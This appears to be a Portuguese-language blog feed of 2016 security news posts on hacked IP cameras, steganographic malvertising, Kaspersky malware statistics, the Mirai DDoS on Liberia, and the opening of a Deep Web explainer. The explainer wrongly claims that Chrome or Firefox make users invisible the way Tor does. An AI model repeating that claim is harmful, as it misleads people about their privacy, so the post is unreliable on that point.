<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">O vídeo a seguir mostra o processo de invasão de uma câmera conectada.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px;">
<span class="embed-youtube" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; display: block; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: center;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/Yaefp0A62bM/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/Yaefp0A62bM?feature=player_embedded" width="320"></iframe></div>
<br />
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">A única forma de garantir que uma câmera afetada esteja segura contra essas explorações promovidas por hackers é <a href="https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of-unpatchable-ip-cameras-affected-by-two-zero-days/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">jogando-a fora</a>“, disse o pesquisador Amit Serper. “É sério.”</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<b style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Como não transformar sua câmera em um zumbi</b></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Para se proteger da maioria dos hacks com câmeras ou outros dispositivos conectados à internet, a solução é sempre configurar senhas de acesso fortes, ou seja, que não sejam previsíveis, como o ano do seu nascimento ou o nome de um parente. Lembrar de tantas senhas, porém, não é simples. Mas você pode adotar gerenciadores de senhas, <a href="http://exame.abril.com.br/tecnologia/aplicativo-que-guarda-suas-senhas-com-seguranca-agora-e-gratis/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">como o LastPass</a>, que é gratuito e tem um gerador de senhas que oferece longas combinações de caracteres muito difíceis de descobrir.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;"><a href="http://www.makeuseof.com/tag/hack-attack-how-to-keep-your-webcam-secure-from-online-peeping-toms/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;" target="_blank">Outra medida</a> importante a ser tomada para a prevenção de invasões de hackers é atualizar o software da sua câmera e do seu roteador, o firmware, normalmente disponibilizado para download no site da fabricante. Fora isso, é sempre bom ter um firewall ativo. </span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Há também, é claro, quem opte por medidas mais drásticas, como é o caso do CEO e cofundador do Facebook, Mark Zuckerberg, que cobre sua webcam com fita adesiva. Mas isso não seria muito inteligente se o seu objetivo é ter uma câmera cujas imagens você – e somente você – pode acessar via internet.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">Agora, se você é jornalista ou mantém um blog ou site com divulgações de conteúdos de interesse público, o Google possui uma tecnologia de proteção de DDoS gratuita chamada Project Shield. Basta se inscrever no programa online e você terá acesso ao código que precisa usar para proteger sua página na web.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">O professor Fröhlich dá uma dimensão da importância de ter cuidado com as suas senhas, seja você um usuário doméstico de produtos tecnológicos ou mesmo um profissional de TI de uma grande empresa ou órgão público. “Todos esses ataques são um bom alerta do começo de um movimento. Nos próximos dez anos, veremos coisas piores, como semáforos que abrem para os dois lados ao mesmo tempo ou mesmo placas mostrando mensagens indevidas nas ruas”, disse.</span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; color: rgba(33, 33, 33, 0.901961); font-family: Roboto, sans-serif; font-size: 18px; line-height: 27px; list-style: none; margin-bottom: 20px; outline: 0px; padding: 0px 0px 0px 30px; text-align: justify;">
<span style="border: 0px; box-sizing: border-box; list-style: none; margin: 0px; outline: 0px; padding: 0px;">E se você pensa que pode ficar despreocupado porque não têm nem pretende ter câmeras conectadas na sua casa ou empresa, tudo bem. Mas é melhor se prevenir e gerenciar bem as suas senhas do que <a href="http://exame.abril.com.br/tecnologia/geladeira-participou-de-rede-zumbi-usada-para-enviar-spams/" style="border: 0px; box-sizing: border-box; color: #c1161c; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-decoration: none;">descobrir tarde demais que a sua geladeira faz parte de uma rede zumbi de envio de spam</a>.</span></div>
</section>mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-44730802867048859612016-12-08T09:11:00.003-02:002016-12-08T09:11:47.129-02:00Malvertising: novo malware se esconde em pixels de banners publicitários<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;">A ESET, famosa empresa provedora de soluções de segurança cibernética, acaba de alertar os internautas sobre um novo exploit kit (ferramenta pronta utilizada por cibercriminosos para lesar suas vítimas) que se esconde dentro de banners publicitários que são exibidos em sites confiáveis. Esse tipo de ataque está sendo chamado de malvertising — uma junção das palavras “malware” e “advertising” (“propaganda” em inglês).</span></div>
<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;"><a href="https://imgnzn-a.akamaized.net///2016/12/07/07124728136147-t1200x480.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="273" src="https://imgnzn-a.akamaized.net///2016/12/07/07124728136147-t1200x480.jpg" width="640" /></a></span></div>
<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;">Funciona assim: o internauta visita uma página web qualquer, o banner infectado é exibido, seu código malicioso começa a rastrear o sistema do usuário em busca de vulnerabilidades (mesmo sem ser clicado) e instala outros vírus na máquina. Felizmente, ao que tudo indica, o exploit kit só usufrui de brechas encontradas no <a href="https://www.tecmundo.com.br/internet-explorer/" style="border-bottom: 2px solid transparent; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank" title="Internet Explorer">Internet Explorer</a> e no <a href="https://www.tecmundo.com.br/flash/" style="border-bottom: 2px solid transparent; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank" title="Flash">Adobe Flash Player</a> — se você não utiliza mais esses softwares, na teoria, estará seguro.</span></div>
<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;"><br /></span></div>
<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;"><span class="img-fc" style="box-sizing: border-box; clear: both; display: block; margin-bottom: 52px; margin-top: 52px; text-align: center;"><span class="desc" style="box-sizing: border-box; display: block; font-style: italic; margin-top: 26px;"><img height="640" src="https://imgnzn-a.akamaized.net/2016/12/07/07124455386140.jpg?w=700" width="466" /></span><span class="desc" style="box-sizing: border-box; display: block; font-style: italic; margin-top: 26px;">Esquema de funcionamento do exploit kit</span></span></span></div>
<div dir="ltr" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span style="box-sizing: border-box;"></span></div>
<div style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; margin-top: 26px;">
<span id="docs-internal-guid-a2363415-d9bd-6e00-2e14-3dbd3f0e4505" style="box-sizing: border-box;">O mais assustador é que o código malicioso se esconde em pixels dos banners afetados, utilizando uma técnica conhecida como esteganografia. A olho nu, é impossível saber se determinado anúncio está infectado ou não. A ESET não conseguiu estimar a quantidade de usuários que podem já ter sido afetados pelo exploit kit, mas garante que o ataque já fez “milhões” de vítimas.</span></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-49248369577529946192016-12-07T09:07:00.003-02:002016-12-07T09:07:43.221-02:00Número do ano 2016: um bilhão de itens de malware são mantidos no banco de dados em nuvem da Kaspersky Lab<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
A base de dados de malware em nuvem da Kaspersky Lab agora contém um bilhão de objetos maliciosos, incluindo vírus, trojans, backdoors, ransomware, além de aplicativos de publicidade e seus componentes. Um quinto deles foi descoberto e identificado como malicioso pelo Astraea – um sistema de análise automática de malware que opera dentro da infraestrutura da Kaspersky Lab.</div>
<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
O número de ameaças virtuais que surgem todos os dias é tão grande que tornou-se impossível processar cada uma delas manualmente. Por isso, a automação do processo de descoberta e análise de malware, em associação com o conhecimento humano, é a melhor abordagem viável para combater as ameaças virtuais modernas.</div>
<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
A porcentagem de malware descobertos e adicionados automaticamente ao banco de dados em nuvem da Kaspersky Lab pelo Astraea tem aumentado regularmente nos últimos cinco anos: de 7,53% em 2012 para 40,5% em dezembro de 2016. A proporção cresce em sincronia com o número de novos arquivos maliciosos descobertos diariamente pelos especialistas e sistemas de detecção da Kaspersky Lab – esse crescimento foi de 70.000 arquivos por dia em 2011 para 323.000[1] por dia em 2016. </div>
<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
<img alt="Resultado de imagem para Kaspersky" src="data:image/png;base64,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" /><br /><br />“Ter um bilhão de arquivos maliciosos exclusivos é um marco incrível. Isso mostra a dimensão do submundo do crime virtual, que evoluiu de vários fóruns pequenos que ofereciam ferramentas maliciosas personalizadas para a produção em massa de malware e atividades cibercriminosas feitas sob medida. Esse marco também destaca a qualidade e a evolução de nossas tecnologias automatizadas de análise de malware. Desse bilhão de arquivos, mais de 200 milhões foram adicionados pelo sistema de análise automática Astraea. Nossos sistemas avançados não somente detectam a grande maioria dos malware conhecidos encontrados diariamente como também descobrem ameaças desconhecidas. Embora os outros 800 milhões de arquivos tenham sido adicionados por outros sistemas internos de detecção ou por nossos especialistas, a contribuição para a base de dados em nuvem da Kaspersky Lab feita por meio do sistema de análise automática é significativo e continuará aumentando”, diz Vyacheslav Zakorzhevsky, chefe da equipe de antimalware da Kaspersky Lab.</div>
<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
O Astraea é um dos sistemas de análise automática de malware que faz parte da infraestrutura de proteção da Kaspersky Lab e analisa automaticamente as notificações recebidas de computadores protegidos e ajuda a descobrir ameaças ainda desconhecidas. Ao usar esses metadados (como idade, origem, nome do arquivo, caminho do arquivo, e mais), o Astrea é capaz de detector ameaças sem precisar usar informações sobre o conteúdo dos arquivos.</div>
<div style="color: #666666; font-family: Arial, Helvetica, sans-serif; text-align: justify;">
O ‘Número do Ano’ da Kaspersky Lab é parte do Boletim de Segurança de 2016 da Kaspersky. Outras seções incluem as Previsões de Ameaças para 2017, publicadas em 16 de novembro, disponíveis aqui, e o tema do ano: Ransomware, além do Resumo executivo, análise e estatísticas do relatório principal, disponibilizado em dezembro.<br /><br />Leia mais sobre as estatísticas de ameaças em Securelist.com.</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-23880366376250167002016-11-07T08:41:00.001-02:002016-12-04T23:36:35.891-02:00Libéria sofre intenso ataque hacker e fica totalmente sem internet<table border="0" cellpadding="4" cellspacing="0"><tbody>
<tr align="justify" style="font-family: verdana;"><td class="verdana11preto" width="90%"><div>
<span style="color: #999999;"><span style="background-color: white;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">A Libéria está sob intenso ataque
cibernético e toda sua infraestrutura de internet está fora do ar nesta
sexta-feira (04). A técnica utilizada pelos crackers é a mesma que
derrubou serviços e sites como Netflix, eBay e Reddit no mês passado, e a
reincidência de ataques como este começam a preocupar autoridades dos
Estados Unidos sobre uma possível sabotagem às eleições presidenciais
que acontecerão na próxima terça-feira, dia 8.
Considerada precária, a infraestrutura de internet do país africano vem
sendo alvo de ataques DDoS desde o início desta semana. Hoje, uma
investida mais vigorosa acabou deixando todo o país sem internet.
"Percebemos uma série de ataques de curta duração à infraestrutura da
Libéria no decorrer desta semana", disse o especialista em segurança
digital Kevin Beaumont. "Eles são extremamente preocupantes porque
sugerem que há alguém operando uma [botnet] Mirai com capacidade
suficiente para prejudicar todos os sistemas de um estado-nação".
Esse tipo de rede zumbi utiliza webcams, DVD players e outros
dispositivos conectados à internet para disparar uma quantidade absurda
de requisições a um alvo específico. No caso da Libéria, o DNS que
atende o país foi a vítima dos ataques de negação de serviço, e acabou
não aguentando o tranco, tendo de sair do ar. </span></span></span></div>
<div>
</div>
<div>
<h3>
<span style="color: #999999;"><span style="background-color: white;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Boicote às eleições nos EUA </span></span></span></h3>
</div>
<div>
</div>
<div>
<span style="color: #999999;"><span style="background-color: white;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Grupos e profissionais especialistas em segurança digital temem que os
ataques desta semana sejam uma espécie de teste para deflagrar um ataque
massivo durante as eleições presidenciais dos EUA que acontecerão na
próxima terça-feira (08), sobretudo os estados cujo sistema já é
informatizado. </span></span></span></div>
<div>
<span style="color: #999999;"><span style="background-color: white;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> </span></span></span><img alt="Ataques de negação de serviço identificados pela Kaspersky Lab somente na primeira semana de outubro" height="302" src="https://imagens.canaltech.com.br/163891-Ataques-DDoS-no-mundo.png" title="Ataques de negação de serviço identificados pela Kaspersky Lab somente na primeira semana de outubro" width="400" /></div>
<div>
<span style="color: #999999;"><span style="background-color: white;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Ataques de negação de serviço identificados pela Kaspersky Lab somente
na primeira semana de outubro
Ataques de negação de serviço identificados pela Kaspersky Lab somente
na primeira semana de outubro (Reprodução: Kaspersky Lab)
Para Adam D'Angelo, diretor executivo do Quora, o número crescente de
ataques DDoS detectado na última semana é um forte indício de que há
grupos dispostos a prejudicar as eleições. Com os sistemas fora do ar e o
atual cenário político nos EUA, atrasa-se a apuração dos votos e
abre-se espaço para "suspeitas de fraude eleitoral", alertou Sean
Sullivan, pesquisador da F-Secure.
Dados divulgados pela Kaspersky Lab mostram que somente na primeira
semana de outubro deste ano foram detectados mais de 650 mil ataques
DDoS em todo o mundo. É um número que sozinho preocupa e que, com o
ataque da magnitude do de hoje, ganha ainda mais força.
Via The Telegraph</span></span></span><br />
<br /></div>
</td></tr>
</tbody></table>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-83755806275447957242016-12-01T09:10:00.000-02:002016-12-01T09:10:10.701-02:00Deep Web - Como entrar?<div class="post-header" style="background-color: white; box-sizing: border-box; font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px;">
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 36px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px;">
Como entrar na Deep Web e o que vou encontrar lá?</h1>
<div style="box-sizing: border-box; margin-bottom: 10px;">
<br /></div>
</div>
<div class="post-image" style="background-color: white; box-sizing: border-box; font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; margin: 20px 0px;">
<img alt="matrix" src="http://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/matrix.jpg" /></div>
<div class="post-body" style="background-color: white; box-sizing: border-box; font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; text-align: justify;">
<br /><div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
O Google vê tudo, ouve tudo e reproduz tudo. Será? Se até Deus tem um ponto cego – ou o diabo não existiria – você acredita mesmo que hackers, criminosos, piratas digitais e vendedores, entre vários outros tipos de pessoas que querem agir na surdina, não bolaram um jeito de esconder seus domínios virtuais de olhares curiosos?</div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
É claro que sim, e essa opção inclusive é bem fácil, não requisitando nem mesmo domínio de criptografia ou programação: basta informar que você não quer que o conteúdo do seu blog ou site seja público. Por isso, na verdade, como se diz, a internet comum (ou “Surface”, que significa “Superfície”) é apenas “a ponta do iceberg”, ou seja, há muito mais escondido do que revelado quando você procura por algo num site de busca.</div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Por isso, a Deep Web não é exatamente recente, mas vem se popularizando muito ultimamente pelas bizarrices que podem ser encontradas nela, como fóruns de canibais, “human dolls”, pedofilia e outras coisas que qualquer pessoa com um mínimo de bom senso não procuraria no Google comum. Por isso, desmistificamos a Deep Web e a explicamos pra você a seguir, sem tabus nem exagero:</div>
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 500; line-height: 40px; margin: 20px 0px 10px;">
1) Navegadores especiais</h1>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
<img alt="tbb-screenshot3" src="https://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/tbb-screenshot3-600x450.jpg" /></div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Não é apenas o TOR que acessa a Deep Web, mas também o I2P e o Freenet, que são os mais populares. Além deles, também se usa muito o LINUX, por sua segurança.</div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Outras opções menos “pop” são o Netsukuku, Freifunk, Funkfeuer, OneSwarm, GnuNet, RetroShare, Phantom, GlobaLeaks, Namecoin, OpenNIC, Dot-P2P, Guifi, AnoNet2, dn42, CJDNS, Osiris, FreedomBox, Telex, Omemo, Project Byzantium e Hyperboria, só pra citar alguns. O TOR é o mais popular por criptografar seus dados, te deixando “invisível”, mas até o Chrome ou o Firefox fazem isso.</div>
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 500; line-height: 40px; margin: 20px 0px 10px;">
2) Quando você olha para dentro do abismo, ele também olha dentro de você</h1>
